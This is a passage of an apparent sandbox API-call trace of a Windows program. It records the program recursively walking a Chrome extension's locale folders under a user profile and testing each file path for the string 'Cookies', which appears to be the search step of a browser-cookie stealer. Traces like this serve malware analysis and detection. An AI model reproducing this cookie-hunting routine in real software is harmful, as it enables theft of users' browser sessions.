ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.287] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.287] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.287] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.287] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned 137 [0163.287] lstrlenW (lpString="\\") returned 1 [0163.287] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0163.287] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\" [0163.287] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\") returned 138 [0163.287] lstrlenW (lpString="messages.json") returned 13 [0163.287] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\" [0163.287] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" [0163.287] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json", lpSrch="Cookies") returned 0x0 [0163.287] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.288] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.288] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="es_419", cAlternateFileName="")) returned 1 [0163.288] lstrcmpiW (lpString1="es_419", lpString2=".") returned 1 [0163.288] lstrcmpiW (lpString1="es_419", lpString2="..") returned 1 [0163.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.288] lstrlenW (lpString="\\") returned 1 [0163.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.288] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.288] lstrlenW (lpString="es_419") returned 6 [0163.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.288] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0163.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0163.288] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*" [0163.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.289] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.289] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.289] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.289] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.289] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.289] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned 141 [0163.289] lstrlenW (lpString="\\") returned 1 [0163.289] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0163.289] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\" [0163.289] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\") returned 142 [0163.289] lstrlenW (lpString="messages.json") returned 13 [0163.289] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\" [0163.289] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" [0163.289] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json", lpSrch="Cookies") returned 0x0 [0163.289] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.289] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.289] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="et", cAlternateFileName="")) returned 1 [0163.289] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0163.290] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0163.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.290] lstrlenW (lpString="\\") returned 1 [0163.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.290] lstrlenW (lpString="et") returned 2 [0163.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0163.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0163.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*" [0163.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.290] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.290] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.290] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.290] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.290] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned 137 [0163.291] lstrlenW (lpString="\\") returned 1 [0163.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0163.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\" [0163.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\") returned 138 [0163.291] lstrlenW (lpString="messages.json") returned 13 [0163.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\" [0163.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" [0163.291] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json", lpSrch="Cookies") returned 0x0 [0163.291] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, 